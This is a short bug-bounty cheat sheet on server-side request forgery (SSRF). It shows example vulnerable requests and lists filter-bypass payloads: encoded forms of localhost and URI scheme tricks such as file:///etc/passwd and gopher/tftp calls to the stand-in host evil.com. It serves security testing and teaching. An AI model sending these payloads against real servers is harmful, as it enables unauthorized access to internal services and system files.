AllAboutBugBounty/Server Side Request Forgery.md
2022-07-09 22:37:59 +07:00

1.6 KiB

Server Side Request Forgery (SSRF)

Introduction

Server Side Request Forgery is a web application vulnerability that allows attackers to make outgoing requests originating from the vulnerable server

Where to find

Usually it can be found in the request that contain request to another url, for example like this

POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1

or

GET /image?url=http://192.168.1.1/
Host: example.com

How to exploit

  1. Basic payload
http://127.0.0.1:1337
http://localhost:1337
  1. Hex encoding
http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1
  1. Octal encoding
http://127.0.0.1 -> http://0177.0.0.01
  1. Dword encoding
http://127.0.0.1 -> http://2130706433
  1. Mixed encoding
http://127.0.0.1 -> http://0177.0.0.0x1
  1. Using URL encoding
http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74
  1. Using IPv6
http://0000::1:1337/
http://[::]:1337/
  1. Using bubble text
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ

Use this https://capitalizemytitle.com/bubble-text-generator/

How to exploit (URI Scheme)

  1. File scheme
file:///etc/passwd
  1. Dict scheme
dict://127.0.0.1:1337/
  1. FTP scheme
ftp://127.0.0.1/
  1. TFTP scheme
tftp://evil.com:1337/test
  1. SFTP scheme
sftp://evil.com:1337/test
  1. LDAP scheme
ldap://127.0.0.1:1337/
  1. Gopher scheme
gopher://evil.com/_Test%0ASSRF

References